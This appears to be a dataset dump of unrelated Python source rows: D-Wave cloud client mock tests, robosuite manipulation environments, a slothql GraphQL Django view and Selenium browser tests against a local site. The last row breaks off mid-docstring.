content stringlengths 5 1.05M |
|---|
"""Test problem submission against hard-coded replies with unittest.mock."""
from __future__ import division, absolute_import, print_function, unicode_literals
import time
import json
import unittest
import itertools
import threading
from datetime import datetime, timedelta
from dateutil.tz import UTC
from dateutil.parser import parse as parse_datetime
from dwave.cloud.utils import evaluate_ising
from dwave.cloud.qpu import Client, Solver
from dwave.cloud.exceptions import SolverFailureError, CanceledFutureError
from dwave.cloud.testing import mock
def solver_data(id_, incomplete=False):
    """Build a mock solver-description dict for tests.

    When *incomplete* is true, the ``parameters`` property is left out so
    tests can exercise handling of partial solver data.
    """
    properties = {
        "supported_problem_types": ["qubo", "ising"],
        "qubits": [0, 1, 2, 3, 4],
        "couplers": list(itertools.combinations(range(5), 2)),
        # NOTE(review): num_qubits=3 disagrees with the 5-entry qubit list;
        # presumably irrelevant to these tests — confirm before relying on it.
        "num_qubits": 3,
        "parameters": {"num_reads": "Number of samples to return."},
    }
    if incomplete:
        properties.pop('parameters')
    return {
        "properties": properties,
        "id": id_,
        "description": "A test solver",
    }
def complete_reply(id_, solver_name):
    """Serialize a COMPLETED reply carrying base64-encoded answer data."""
    reply = {
        "status": "COMPLETED",
        "solved_on": "2013-01-18T10:26:00.020954",
        "solver": solver_name,
        "submitted_on": "2013-01-18T10:25:59.941674",
        "answer": {
            'format': 'qp',
            "num_variables": 5,
            "energies": 'AAAAAAAALsA=',
            "num_occurrences": 'ZAAAAA==',
            "active_variables": 'AAAAAAEAAAACAAAAAwAAAAQAAAA=',
            "solutions": 'AAAAAA==',
            "timing": {},
        },
        "type": "ising",
        "id": id_,
    }
    return json.dumps(reply)
def complete_no_answer_reply(id_, solver_name):
    """Serialize a COMPLETED reply that omits the answer payload."""
    reply = {
        "status": "COMPLETED",
        "solved_on": "2012-12-05T19:15:07+00:00",
        "solver": solver_name,
        "submitted_on": "2012-12-05T19:06:57+00:00",
        "type": "ising",
        "id": id_,
    }
    return json.dumps(reply)
def error_reply(id_, solver_name, error):
    """Serialize a FAILED reply carrying *error* as the error message."""
    reply = {
        "status": "FAILED",
        "solved_on": "2013-01-18T10:26:00.020954",
        "solver": solver_name,
        "submitted_on": "2013-01-18T10:25:59.941674",
        "type": "ising",
        "id": id_,
        "error_message": error,
    }
    return json.dumps(reply)
def cancel_reply(id_, solver_name):
    """Serialize a CANCELLED reply for a problem."""
    reply = {
        "status": "CANCELLED",
        "solved_on": "2013-01-18T10:26:00.020954",
        "solver": solver_name,
        "submitted_on": "2013-01-18T10:25:59.941674",
        "type": "ising",
        "id": id_,
    }
    return json.dumps(reply)
def timestamp_in_future(seconds=0):
    """Return a timezone-aware UTC datetime *seconds* from now.

    Uses ``datetime.now(timezone.utc)`` instead of the deprecated
    ``datetime.utcnow()`` + ``replace(tzinfo=...)``; the result is the
    same aware UTC timestamp.
    """
    from datetime import timezone  # local import: keeps module imports untouched
    return datetime.now(timezone.utc) + timedelta(seconds=seconds)
def continue_reply(id_, solver_name, now=None, eta_min=None, eta_max=None):
    """Serialize a PENDING (still in queue) reply.

    :param now: submission timestamp; defaults to the current UTC time
        (aware, via ``datetime.now(timezone.utc)`` — the deprecated
        ``datetime.utcnow()`` is no longer used).
    :param eta_min: optional earliest estimated completion; included only
        when given.
    :param eta_max: optional latest estimated completion; included only
        when given.
    """
    if not now:
        from datetime import timezone  # local import: keeps module imports untouched
        now = datetime.now(timezone.utc)
    resp = {
        "status": "PENDING",
        "solved_on": None,
        "solver": solver_name,
        "submitted_on": now.isoformat(),
        "type": "ising",
        "id": id_,
    }
    if eta_min:
        resp["earliest_estimated_completion"] = eta_min.isoformat()
    if eta_max:
        resp["latest_estimated_completion"] = eta_max.isoformat()
    return json.dumps(resp)
def choose_reply(path, replies):
    """Return a mock HTTP response for *path*, looked up in *replies*.

    Raises NotImplementedError for any path the test did not stub, so an
    unexpected request fails loudly instead of hanging.
    """
    if path not in replies:
        raise NotImplementedError(path)
    body = replies[path]
    response = mock.Mock(['json', 'raise_for_status'])
    response.status_code = 200
    response.json.side_effect = lambda: json.loads(body)
    return response
class _QueryTest(unittest.TestCase):
    """Shared assertions for problem-sampling tests."""

    def _check(self, results, linear, quad, num):
        """Verify sample counts and that reported energies match the states."""
        # All occurrence counts should add up to the requested 100 reads.
        total_occurrences = sum(results.occurrences)
        self.assertTrue(100 == total_occurrences)

        # Every reported energy must equal the energy recomputed from its state.
        for energy, state in zip(results.energies, results.samples):
            recomputed = evaluate_ising(linear, quad, state)
            self.assertTrue(energy == recomputed)
# Patch time.sleep globally so polling loops in these tests run without delays.
@mock.patch('time.sleep', lambda *x: None)
class MockSubmission(_QueryTest):
    """Test connecting and some related failure modes."""

    def test_submit_null_reply(self):
        """Get an error when the server's response is incomplete."""
        with Client('endpoint', 'token') as client:
            # Replace the HTTP session so no real requests are made.
            client.session = mock.Mock()
            # An empty body is not parseable JSON, so reading results must fail.
            client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': ''})
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            with self.assertRaises(ValueError):
                results.samples

    def test_submit_ok_reply(self):
        """Handle a normal query and response."""
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            # Submission acknowledges completion without the answer; the full
            # answer is then fetched from the individual problem endpoint.
            client.session.post = lambda a, _: choose_reply(a, {
                'endpoint/problems/': '[%s]' % complete_no_answer_reply('123', 'abc123')})
            client.session.get = lambda a: choose_reply(a, {'endpoint/problems/123/': complete_reply('123', 'abc123')})
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            self._check(results, linear, quad, 100)

    def test_submit_error_reply(self):
        """Handle an error on problem submission."""
        error_body = 'An error message'
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.post = lambda a, _: choose_reply(a, {
                'endpoint/problems/': '[%s]' % error_reply('123', 'abc123', error_body)})
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            with self.assertRaises(SolverFailureError):
                results.samples

    def test_submit_cancel_reply(self):
        """Handle a response for a canceled job."""
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': '[%s]' % cancel_reply('123', 'abc123')})
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            with self.assertRaises(CanceledFutureError):
                results.samples

    def test_submit_continue_then_ok_reply(self):
        """Handle polling for a complete problem."""
        with Client('endpoint', 'token') as client:
            eta_min, eta_max = timestamp_in_future(10), timestamp_in_future(30)
            client.session = mock.Mock()
            # Submission returns PENDING with ETA bounds; the status poll
            # then reports completion, and the answer is fetched separately.
            client.session.post = lambda a, _: choose_reply(a, {
                'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123', eta_min=eta_min, eta_max=eta_max)
            })
            client.session.get = lambda a: choose_reply(a, {
                'endpoint/problems/?id=123': '[%s]' % complete_no_answer_reply('123', 'abc123'),
                'endpoint/problems/123/': complete_reply('123', 'abc123')
            })
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            self._check(results, linear, quad, 100)

            # test future has eta_min and eta_max parsed correctly
            self.assertEqual(results.eta_min, eta_min)
            self.assertEqual(results.eta_max, eta_max)

    def test_submit_continue_then_error_reply(self):
        """Handle polling for an error message."""
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.post = lambda a, _: choose_reply(a, {'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123')})
            client.session.get = lambda a: choose_reply(a, {
                'endpoint/problems/?id=123': '[%s]' % error_reply('123', 'abc123', "error message")})
            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            results = solver.sample_ising(linear, quad, num_reads=100)

            with self.assertRaises(SolverFailureError):
                self._check(results, linear, quad, 100)

    # Reduce the number of poll and submission threads so that the system can be tested
    @mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
    @mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
    def test_submit_continue_then_ok_and_error_reply(self):
        """Handle polling for the status of multiple problems."""
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()

            # on first status poll, return pending for both problems
            # on second status poll, return error for first problem and complete for second
            # NOTE: the mutable default `state` deliberately persists call
            # count across invocations of this stub.
            def continue_then_complete(path, state={'count': 0}):
                state['count'] += 1
                if state['count'] < 2:
                    return choose_reply(path, {
                        'endpoint/problems/?id=1': '[{}]'.format(continue_reply('1', 'abc123')),
                        'endpoint/problems/?id=2': '[{}]'.format(continue_reply('2', 'abc123')),
                        'endpoint/problems/1/': continue_reply('1', 'abc123'),
                        'endpoint/problems/2/': continue_reply('2', 'abc123'),
                        'endpoint/problems/?id=1,2': '[{},{}]'.format(continue_reply('1', 'abc123'),
                                                                      continue_reply('2', 'abc123')),
                        'endpoint/problems/?id=2,1': '[{},{}]'.format(continue_reply('2', 'abc123'),
                                                                      continue_reply('1', 'abc123'))
                    })
                else:
                    return choose_reply(path, {
                        'endpoint/problems/?id=1': '[{}]'.format(error_reply('1', 'abc123', 'error')),
                        'endpoint/problems/?id=2': '[{}]'.format(complete_no_answer_reply('2', 'abc123')),
                        'endpoint/problems/1/': error_reply('1', 'abc123', 'error'),
                        'endpoint/problems/2/': complete_reply('2', 'abc123'),
                        'endpoint/problems/?id=1,2': '[{},{}]'.format(error_reply('1', 'abc123', 'error'),
                                                                      complete_no_answer_reply('2', 'abc123')),
                        'endpoint/problems/?id=2,1': '[{},{}]'.format(complete_no_answer_reply('2', 'abc123'),
                                                                      error_reply('1', 'abc123', 'error'))
                    })
            client.session.get = continue_then_complete

            def accept_problems_with_continue_reply(path, body, ids=iter('12')):
                # Assign ids '1' and '2' to the submitted problems, in order.
                problems = json.loads(body)
                return choose_reply(path, {
                    'endpoint/problems/': json.dumps(
                        [json.loads(continue_reply(next(ids), 'abc123')) for _ in problems])
                })
            client.session.post = accept_problems_with_continue_reply

            solver = Solver(client, solver_data('abc123'))

            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}

            results1 = solver.sample_ising(linear, quad, num_reads=100)
            results2 = solver.sample_ising(linear, quad, num_reads=100)

            with self.assertRaises(SolverFailureError):
                self._check(results1, linear, quad, 100)
            self._check(results2, linear, quad, 100)

    # Reduce the number of poll and submission threads so that the system can be tested
    @mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
    @mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
    def test_exponential_backoff_polling(self):
        "After each poll, back-off should double"
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            # on submit, return status pending
            client.session.post = lambda path, _: choose_reply(path, {
                'endpoint/problems/': '[%s]' % continue_reply('123', 'abc123')
            })

            # on first and second status poll, return pending
            # on third status poll, return completed
            def continue_then_complete(path, state={'count': 0}):
                state['count'] += 1
                if state['count'] < 3:
                    return choose_reply(path, {
                        'endpoint/problems/?id=123': '[%s]' % continue_reply('123', 'abc123'),
                        'endpoint/problems/123/': continue_reply('123', 'abc123')
                    })
                else:
                    return choose_reply(path, {
                        'endpoint/problems/?id=123': '[%s]' % complete_no_answer_reply('123', 'abc123'),
                        'endpoint/problems/123/': complete_reply('123', 'abc123')
                    })
            client.session.get = continue_then_complete

            solver = Solver(client, solver_data('abc123'))

            future = solver.sample_qubo({})
            future.result()

            # after third poll, back-off interval should be 4 x initial back-off
            self.assertEqual(future._poll_backoff, Client._POLL_BACKOFF_MIN * 2**2)

    @mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
    @mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
    def test_eta_min_is_respected_on_first_poll(self):
        "eta_min/earliest_estimated_completion should be respected if present in response"
        with Client('endpoint', 'token') as client:
            eta_min, eta_max = timestamp_in_future(10), timestamp_in_future(30)
            client.session = mock.Mock()
            client.session.post = lambda path, _: choose_reply(path, {
                'endpoint/problems/': '[%s]' % continue_reply('1', 'abc123', eta_min=eta_min, eta_max=eta_max)
            })
            client.session.get = lambda path: choose_reply(path, {
                'endpoint/problems/?id=1': '[%s]' % complete_no_answer_reply('1', 'abc123'),
                'endpoint/problems/1/': complete_reply('1', 'abc123')
            })

            solver = Solver(client, solver_data('abc123'))

            def assert_min_eta(s):
                # The sleep before the first poll should be ~10s (eta_min offset).
                s and self.assertTrue(abs(s - 10) < 1)

            with mock.patch('time.sleep', assert_min_eta):
                future = solver.sample_qubo({})
                future.result()

    @mock.patch.object(Client, "_POLL_THREAD_COUNT", 1)
    @mock.patch.object(Client, "_SUBMISSION_THREAD_COUNT", 1)
    def test_immediate_polling_without_eta_min(self):
        "First poll happens with minimal delay if eta_min missing"
        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.post = lambda path, _: choose_reply(path, {
                'endpoint/problems/': '[%s]' % continue_reply('1', 'abc123')
            })
            client.session.get = lambda path: choose_reply(path, {
                'endpoint/problems/?id=1': '[%s]' % complete_no_answer_reply('1', 'abc123'),
                'endpoint/problems/1/': complete_reply('1', 'abc123')
            })

            solver = Solver(client, solver_data('abc123'))

            def assert_no_delay(s):
                # Any sleep must stay within 10% of the minimal back-off.
                s and self.assertTrue(
                    abs(s - client._POLL_BACKOFF_MIN) < client._POLL_BACKOFF_MIN / 10.0)

            with mock.patch('time.sleep', assert_no_delay):
                future = solver.sample_qubo({})
                future.result()
class DeleteEvent(Exception):
    """Raised by the mocked client when an HTTP DELETE request is issued.

    Carries the request URL and serialized body so tests can assert on
    exactly what would have been sent.
    """

    def __init__(self, url, body):
        """Record the request URL and body for later test verification."""
        self.body = body
        self.url = url

    @staticmethod
    def handle(path, **kwargs):
        """Session-compatible callback: report the delete via an exception."""
        payload = json.dumps(kwargs['json'])
        raise DeleteEvent(path, payload)
# Patch time.sleep globally so these tests never actually wait.
@mock.patch('time.sleep', lambda *x: None)
class MockCancel(unittest.TestCase):
    """Make sure cancel works at the two points in the process where it should."""

    def test_cancel_with_id(self):
        """Make sure the cancel method submits to the right endpoint.

        When cancel is called after the submission is finished.
        """
        submission_id = 'test-id'
        reply_body = '[%s]' % continue_reply(submission_id, 'solver')

        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.get = lambda a: choose_reply(a, {'endpoint/problems/?id={}'.format(submission_id): reply_body})
            # Any DELETE raises DeleteEvent, which the test inspects below.
            client.session.delete = DeleteEvent.handle

            solver = Solver(client, solver_data('abc123'))
            future = solver._retrieve_problem(submission_id)
            future.cancel()

            try:
                self.assertTrue(future.id is not None)
                future.samples
                self.fail()
            except DeleteEvent as event:
                # Cancel may be issued either as a batch (ids POSTed to the
                # collection URL) or against the individual problem endpoint;
                # both are valid.
                if event.url == 'endpoint/problems/':
                    self.assertEqual(event.body, '["{}"]'.format(submission_id))
                else:
                    self.assertEqual(event.url, 'endpoint/problems/{}/'.format(submission_id))

    def test_cancel_without_id(self):
        """Make sure the cancel method submits to the right endpoint.

        When cancel is called before the submission has returned the problem id.
        """
        submission_id = 'test-id'
        reply_body = '[%s]' % continue_reply(submission_id, 'solver')

        # Blocks the mocked POST until the test decides to let it through,
        # so cancel() is guaranteed to run before the id is known.
        release_reply = threading.Event()

        with Client('endpoint', 'token') as client:
            client.session = mock.Mock()
            client.session.get = lambda a: choose_reply(a, {'endpoint/problems/?id={}'.format(submission_id): reply_body})

            def post(a, _):
                # Hold the submission until release_reply.set() is called.
                release_reply.wait()
                return choose_reply(a, {'endpoint/problems/': reply_body})
            client.session.post = post
            client.session.delete = DeleteEvent.handle

            solver = Solver(client, solver_data('abc123'))

            # Build a problem
            linear = {index: 1 for index in solver.nodes}
            quad = {key: -1 for key in solver.undirected_edges}
            future = solver.sample_ising(linear, quad)
            future.cancel()

            try:
                release_reply.set()
                future.samples
                self.fail()
            except DeleteEvent as event:
                if event.url == 'endpoint/problems/':
                    self.assertEqual(event.body, '["{}"]'.format(submission_id))
                else:
                    self.assertEqual(event.url, 'endpoint/problems/{}/'.format(submission_id))
|
from rest_framework import permissions
|
import numpy as np
from robosuite.environments.manipulation.causal import Causal
from robosuite.utils.observables import Observable, sensor
class CausalGoal(Causal):
    """Causal manipulation environment with a sampled (optionally visualized) goal."""

    def __init__(self, xy_range=(0.3, 0.4), z_range=0.2, **kwargs):
        """
        :param xy_range: (x, y) half-ranges of the goal-sampling workspace
        :param z_range: z workspace range above the table surface
        """
        # BUGFIX: the default used to be a mutable list ([0.3, 0.4]), which is
        # shared across all instances; a tuple removes that hazard while
        # unpacking identically below.
        self.xy_range = xy_range
        self.z_range = z_range
        self.goal_space_low = None  # lazily initialized on first reset
        self.visualize_goal = True
        super().__init__(**kwargs)

    def _setup_references(self):
        """
        Sets up references to important components. A reference is typically an
        index or a list of indices that point to the corresponding elements
        in a flatten array, which is how MuJoCo stores physical simulation data.
        """
        super()._setup_references()

        # Additional object references from this env
        assert self.num_movable_objects > 0
        self.cube = self.movable_objects[0]
        self.cube_body_id = self.sim.model.body_name2id(self.cube.root_body)
        self.goal_vis_id = self.sim.model.body_name2id(self.model.mujoco_arena.goal_vis.root_body)

    def _reset_internal(self):
        """
        Resets simulation internal configurations and samples a new goal.
        """
        super()._reset_internal()

        if self.goal_space_low is None:
            # Compute the goal-sampling box once, from the table geometry.
            table_len_x, table_len_y, _ = self.table_full_size
            table_offset_z = self.table_offset[2]
            x_range, y_range = self.xy_range
            z_range = self.z_range
            self.goal_space_low = np.array([-x_range,
                                            -y_range,
                                            table_offset_z + 0.02])  # 0.02 is the half-size of the object
            self.goal_space_high = np.array([x_range,
                                             y_range,
                                             table_offset_z + z_range])

        self.goal = np.random.uniform(self.goal_space_low, self.goal_space_high)
        if self.visualize_goal:
            goal_pos = self.goal.copy()
            goal_pos[-1] -= self.table_offset[2]
            self.sim.model.body_pos[self.goal_vis_id] = goal_pos
        else:
            # Hide the marker below the table when visualization is disabled.
            self.sim.model.body_pos[self.goal_vis_id] = np.array([0, 0, -1])

    def reward(self, action):
        """Task-specific reward; implemented by subclasses."""
        raise NotImplementedError

    def check_success(self):
        """Task-specific success predicate; implemented by subclasses."""
        raise NotImplementedError

    def step(self, action):
        """Step the base environment and annotate `info` with a success flag."""
        next_obs, reward, done, info = super().step(action)
        info["success"] = self.check_success()
        return next_obs, reward, done, info

    def _setup_observables(self):
        """
        Sets up observables to be used for this environment, adding the goal
        position as an object-modality observable.

        Returns:
            OrderedDict: Dictionary mapping observable names to its corresponding Observable object
        """
        observables = super()._setup_observables()

        @sensor(modality="object")
        def goal_pos(obs_cache):
            return self.goal

        observables["goal_pos"] = Observable(name="goal_pos", sensor=goal_pos, sampling_rate=self.control_freq)
        return observables
class CausalReach(CausalGoal):
    """Reach task: bring the end-effector to the goal position."""

    def reward(self, action):
        """Dense reaching reward in [0, 1], decaying with gripper-goal distance."""
        eef_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
        distance = np.linalg.norm(eef_pos - self.goal)
        return 1 - np.tanh(10.0 * distance)

    def check_success(self):
        """Success when the end-effector is within 5 cm of the goal."""
        eef_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
        return np.linalg.norm(eef_pos - self.goal) < 0.05
class CausalPush(CausalGoal):
    """Push task: move the cube to a goal kept near the table surface."""

    def __init__(self, **kwargs):
        assert "z_range" not in kwargs, "invalid set of arguments"
        # The goal must stay at cube height, so the z-range is fixed.
        super().__init__(z_range=0.02, **kwargs)

    def reward(self, action):
        """
        Un-normalized summed components if using reward shaping:
            - Reaching: in [0, reach_mult], to encourage the arm to reach the cube
            - Pushing: in [0, push_mult], to encourage the arm to push the cube to the goal
        Note that the final reward is normalized.
        """
        reach_mult = 0.5
        push_mult = 1.0

        cube_pos = self.sim.data.body_xpos[self.cube_body_id]
        eef_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]

        # Reaching component: decays with gripper-to-cube distance.
        r_reach = (1 - np.tanh(5.0 * np.linalg.norm(eef_pos - cube_pos))) * reach_mult
        # Pushing component: decays with cube-to-goal distance.
        r_push = (1 - np.tanh(5.0 * np.linalg.norm(cube_pos - self.goal))) * push_mult

        # Normalize so the maximum achievable reward is 1.
        return (r_reach + r_push) / (reach_mult + push_mult)

    def check_success(self):
        """Success when the cube is within 5 cm of the goal."""
        cube_pos = self.sim.data.body_xpos[self.cube_body_id]
        return np.linalg.norm(cube_pos - self.goal) < 0.05
class CausalPick(CausalGoal):
    """Pick task: grasp the cube and carry it to a goal in the air.

    Cleanup: a superseded, fully commented-out reward implementation was
    removed from `reward`; the active logic is unchanged.
    """

    def reward(self, action):
        """
        Un-normalized summed components if using reward shaping:
            - Reaching: in [0, reach_mult], to encourage the arm to reach the cube
            - Grasping: in {0, grasp_mult}, to encourage the arm to grasp the cube
            - Lifting: in [0, lift_mult], to encourage the arm to lift the cube to the goal
        Note that the final reward is normalized.
        """
        reach_mult = 0.1
        grasp_mult = 0.35
        lift_mult = 0.5

        # Convention here: last action dim < 0 means the gripper is commanded open.
        gripper_open = action[-1] < 0
        reward = 0

        # Bounds used to map distances into a [0, 1] score.
        max_dist = 1.1
        xy_max_dist = 1.0
        z_max_dist = 0.2
        cube_pos = self.sim.data.body_xpos[self.cube_body_id]
        gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
        xy_dist = np.abs(gripper_site_pos - cube_pos)[:2].sum()
        z_dist = np.abs(gripper_site_pos - cube_pos)[-1]
        # Reward xy alignment first; the z term only contributes once the
        # gripper is nearly above the cube (xy_dist < 0.05).
        dist_score = (xy_max_dist - xy_dist + (z_max_dist - z_dist) * (xy_dist < 0.05)) / (xy_max_dist + z_max_dist)
        r_reach = dist_score * reach_mult * gripper_open

        grasping_cubeA = self._check_grasp(gripper=self.robots[0].gripper, object_geoms=self.cube)
        if grasping_cubeA:
            r_reach += grasp_mult
        reward += r_reach

        # Lifting component is only active while the cube is grasped.
        dist = np.abs(self.goal - cube_pos).sum()
        r_lift = (max_dist - dist) / max_dist * lift_mult * grasping_cubeA
        reward += r_lift

        reward /= (reach_mult + grasp_mult + lift_mult)
        return reward

    def check_success(self):
        """Success when the cube is within 5 cm of the goal."""
        cube_pos = self.sim.data.body_xpos[self.cube_body_id]
        dist = np.linalg.norm(cube_pos - self.goal)
        return dist < 0.05
class CausalGrasp(CausalGoal):
    """Grasp task: reward reaching the cube and holding it in the gripper."""

    def __init__(self, **kwargs):
        assert "z_range" not in kwargs, "invalid set of arguments"
        super().__init__(z_range=0, **kwargs)
        # The goal position is irrelevant for grasping, so don't render it.
        self.visualize_goal = False

    def reward(self, action):
        """
        Un-normalized summed components if using reward shaping:
            - Reaching: in [0, reach_mult], to encourage the arm to reach the cube
            - Grasping: in {0, grasp_mult}, awarded while the cube is grasped

        (Docstring fixed: it previously described a "Pushing" component
        copy-pasted from CausalPush that does not exist here.)
        Note that grasp_mult == 1, so the maximum reward is already normalized.
        """
        reach_mult = 0.5
        grasp_mult = 1.0

        # Last action dim encodes the gripper command; values < 0 mean "open".
        gripper_close = action[-1]
        cube_pos = self.sim.data.body_xpos[self.cube_body_id]
        gripper_site_pos = self.sim.data.site_xpos[self.robots[0].eef_site_id]
        dist = np.abs(gripper_site_pos - cube_pos).sum()
        grasping_cubeA = self._check_grasp(gripper=self.robots[0].gripper, object_geoms=self.cube)
        if grasping_cubeA:
            reward = grasp_mult
        else:
            # Reaching is only rewarded while the gripper is commanded open
            # (gripper_close < 0), so closing early is not encouraged.
            reward = (1 - np.tanh(10.0 * dist)) * (gripper_close < 0) * reach_mult
        return reward
|
import json
from collections import OrderedDict
from typing import Tuple, Optional, Union, Callable
from cached_property import cached_property
from django import template
from django.core.handlers.wsgi import WSGIRequest
from django.views import View
from django.http import HttpResponse, HttpResponseNotAllowed, JsonResponse
from graphql.type.schema import GraphQLSchema
import slothql
from slothql.template import get_template_string
from .utils.request import get_operation_from_request
class GraphQLView(View):
    """Django view serving GraphQL operations and, for browser GETs, GraphiQL."""

    DEBUG = True
    allowed_methods = ('GET', 'POST')

    graphiql_version: str = '0.11.10'
    graphiql_template: str = 'graphiql.html'
    schema: Union[GraphQLSchema, Callable] = None

    @classmethod
    def as_view(cls, **initkwargs):
        """Fail fast if no schema was supplied when wiring up the view."""
        schema = initkwargs.get('schema')
        assert schema is not None, f'Expected schema to be of type Schema, but got {schema}'
        return super().as_view(**initkwargs)

    def dispatch(self, request: WSGIRequest, *args, **kwargs) -> HttpResponse:
        """Route a request to GraphiQL, a JSON error, or the query result."""
        if request.method not in self.allowed_methods:
            return HttpResponseNotAllowed(['GET', 'POST'], 'GraphQL supports only GET and POST requests.')

        query, parse_error = self.get_operation()
        result, status_code = self.get_query_result(query)
        if self.show_graphiql:
            context = template.Context({**self.get_context_data(), **{'result': result if query else ''}})
            # An empty GraphiQL page (no query yet) should still render as 200.
            return HttpResponse(self.template.render(context), status=status_code if query else 200)
        if parse_error:
            return JsonResponse({'errors': [{'message': parse_error}]}, status=400)
        return HttpResponse(content=result, status=status_code, content_type='application/json')

    @cached_property
    def template(self) -> template.Template:
        """Compiled GraphiQL template, loaded once per view instance."""
        return template.Template(get_template_string(self.graphiql_template))

    def get_operation(self) -> Tuple[Optional[slothql.Operation], Optional[str]]:
        """Return (operation, None), or (None, message) for a malformed request."""
        try:
            return get_operation_from_request(self.request), None
        except slothql.InvalidOperation as e:
            return None, str(e)

    def execute_operation(self, operation: slothql.Operation) -> slothql.ExecutionResult:
        """Run the operation against the resolved schema."""
        return slothql.gql(schema=self.get_schema(), operation=operation)

    def get_query_result(self, operation: slothql.Operation = None) -> Tuple[Optional[str], int]:
        """Execute `operation`; return (serialized result, HTTP status)."""
        if operation:
            result = self.execute_operation(operation)
            return self.jsonify(result), 200 if result.valid else 400
        return None, 400

    @classmethod
    def jsonify(cls, data: dict) -> str:
        """Serialize a result: pretty-printed in DEBUG, compact otherwise."""
        if cls.DEBUG:
            return json.dumps(data, sort_keys=True, indent=2, separators=(',', ': '))
        return json.dumps(data, separators=(',', ':'))

    def get_schema(self):
        """Resolve the schema, calling it with the request if it is a factory.

        BUGFIX: the original expression
        `self.DEBUG and self.schema(self.request) if callable(self.schema) else self.schema`
        parsed as `(self.DEBUG and ...) if callable(...) else ...`, so with
        DEBUG off and a callable schema it returned `False` instead of a schema.
        """
        return self.schema(self.request) if callable(self.schema) else self.schema

    @property
    def show_graphiql(self) -> bool:
        """Serve the GraphiQL UI only for browser-like GET requests."""
        return self.request.method == 'GET' and self.request.content_type in ('text/plain', 'text/html')

    def get_context_data(self) -> OrderedDict:
        """Template context for the GraphiQL page."""
        return OrderedDict({
            'title': 'GraphiQL',
            'graphiql_version': self.graphiql_version,
        })
|
self.Item.insert(index, value)
self.numberOfItems = len(self.Item) |
# TC001 - User registration (with random data)
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.options import Options
import time
import random
import string
from selenium.webdriver.common.by import By
# Configure a headless Chrome session shared by the whole test run.
options = Options()
# NOTE(review): `options.headless = True` and `executable_path=` are both
# deprecated in Selenium 4 (use add_argument('--headless') and a Service
# object); kept as-is to preserve behavior on the pinned version.
options.headless = True
driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)

# Load page and give the SPA time to render before tests run.
driver.get("http://localhost:1667/")
time.sleep(5)
def test_register():
    """TC001: register a new user with random credentials; expect a welcome modal."""
    # XPath locators for the sign-up flow.
    signup_link_xpath = '//*[@id="app"]/nav/div/ul/li[3]/a'
    username_input_xpath = '//*[@id="app"]/div/div/div/div/form/fieldset[1]/input'
    email_input_xpath = '//*[@id="app"]/div/div/div/div/form/fieldset[2]/input'
    password_input_xpath = '//*[@id="app"]/div/div/div/div/form/fieldset[3]/input'
    submit_button_xpath = '//*[@id="app"]/div/div/div/div/form/button'

    # Random 10-character alphanumeric credentials.
    alphabet = string.ascii_letters + string.digits
    email = ''.join(random.choice(alphabet) for _ in range(10)) + '@mail.com'
    password = ''.join(random.choice(alphabet) for _ in range(10))
    username = ''.join(random.choice(alphabet) for _ in range(10))

    # Open the sign-up form and submit the registration.
    driver.find_element(By.XPATH, signup_link_xpath).click()
    time.sleep(2)
    driver.find_element(By.XPATH, username_input_xpath).send_keys(username)
    driver.find_element(By.XPATH, email_input_xpath).send_keys(email)
    driver.find_element(By.XPATH, password_input_xpath).send_keys(password)
    driver.find_element(By.XPATH, submit_button_xpath).click()
    time.sleep(10)

    # The success modal should contain the 'Welcome!' message.
    assert 'Welcome!' in driver.find_element(By.XPATH, '/html/body/div[2]/div/div[2]').text
    time.sleep(5)
    driver.find_element(By.XPATH, "/html/body/div[2]/div/div[4]/div/button").click()
    driver.close()
|
import unittest
import time
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
class BlogTest(unittest.TestCase):
    """Browser tests for a blog post's RSS and social share links.

    Fixes: `setUp`/`tearDown` were decorated with `@classmethod`, so `self`
    received the class and the driver leaked into a class attribute; they are
